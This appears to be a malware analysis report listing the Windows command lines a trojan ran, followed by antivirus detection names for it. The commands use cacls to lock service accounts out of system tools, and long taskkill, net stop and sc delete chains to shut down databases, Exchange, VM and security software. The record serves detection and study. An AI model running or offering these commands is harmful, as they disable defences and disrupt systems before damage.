cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\wscript.exe /e /d system |
cmdline | cacls C:\Windows\system32\net.exe /e /d system |
cmdline | cacls C:\Users\Public /e /g Users:r |
cmdline | cacls C:\Windows\system32\wscript.exe /e /d "network service" |
cmdline | cacls C:\Windows\system32\net1.exe /e /d SERVICE |
cmdline | cacls C:\Windows\system32\net.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\wscript.exe /e /g Administrators:r |
cmdline | cacls C:\Users\Public /e /d system |
cmdline | cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\FTP.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\net1.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\net1.exe /e /d "network service" |
cmdline | cacls C:\ProgramData /e /g Administrators:r |
cmdline | cacls C:\Windows\system32\cscript.exe /e /g Users:r |
cmdline | cacls C:\Users\Public /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\SysWOW64\net.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\system32\cscript.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d SERVICE |
cmdline | cacls C:\Windows\system32\wscript.exe /e /g Users:r |
cmdline | cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d "network service" |
cmdline | cacls C:\ProgramData /g Administrators:f |
cmdline | cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\wscript.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d "network service" |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\FTP.exe /e /g Users:r |
cmdline | cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM 
ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM 
BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F" |
cmdline | cacls C:\ProgramData /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\net1.exe /e /d system |
cmdline | cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\FTP.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d system |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f |
cmdline | cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA" |
cmdline | C:\Windows\system32\net1 stop MSExchangeEdgeSync |
cmdline | net stop MSExchangeEdgeSync |
cmdline | cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService" |
cmdline | sc delete zyb_sync |
Lionic | Trojan.Win32.DelShad.4!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
CAT-QuickHeal | Trojan.Delshad |
McAfee | RDN/Generic.tfr |
Cylance | Unsafe |
K7AntiVirus | Riskware ( 0040eff71 ) |
Alibaba | Trojan:Win32/DelShad.17efacf0 |
K7GW | Riskware ( 0040eff71 ) |
Cybereason | malicious.b54507 |
Arcabit | Trojan.Generic.D239A746 |
Symantec | Trojan.Gen.MBT |
ESET-NOD32 | a variant of Generik.FJCGWGZ |
APEX | Malicious |
Kaspersky | Trojan.Win32.DelShad.gol |
BitDefender | Trojan.GenericKD.37332806 |
NANO-Antivirus | Trojan.Win64.DelShad.ixwims |
MicroWorld-eScan | Trojan.GenericKD.37332806 |
Avast | Win64:Malware-gen |
Ad-Aware | Trojan.GenericKD.37332806 |
Sophos | Generic ML PUA (PUA) |
DrWeb | Trojan.MulDrop18.9904 |
TrendMicro | TROJ_GEN.R011C0PH421 |
McAfee-GW-Edition | BehavesLike.Win64.Generic.cc |
FireEye | Generic.mg.6b351a94a1b2da23 |
Emsisoft | Trojan-Downloader.Agent (A) |
MaxSecure | Trojan.Malware.300983.susgen |
MAX | malware (ai score=88) |
Microsoft | Trojan:Win32/Tiggre!rfn |
GData | Trojan.GenericKD.37332806 |
VBA32 | Trojan.Win64.MulDrop |
ALYac | Trojan.GenericKD.37332806 |
Malwarebytes | Trojan.PowerShell |
TrendMicro-HouseCall | TROJ_GEN.R011C0PH421 |
SentinelOne | Static AI - Malicious PE |
Fortinet | W32/DelShad.GOL!tr |
AVG | Win64:Malware-gen |
Panda | Trj/CI.A |
CrowdStrike | win/malicious_confidence_60% (W) |
Qihoo-360 | Win64/Trojan.Generic.HgEASZgA |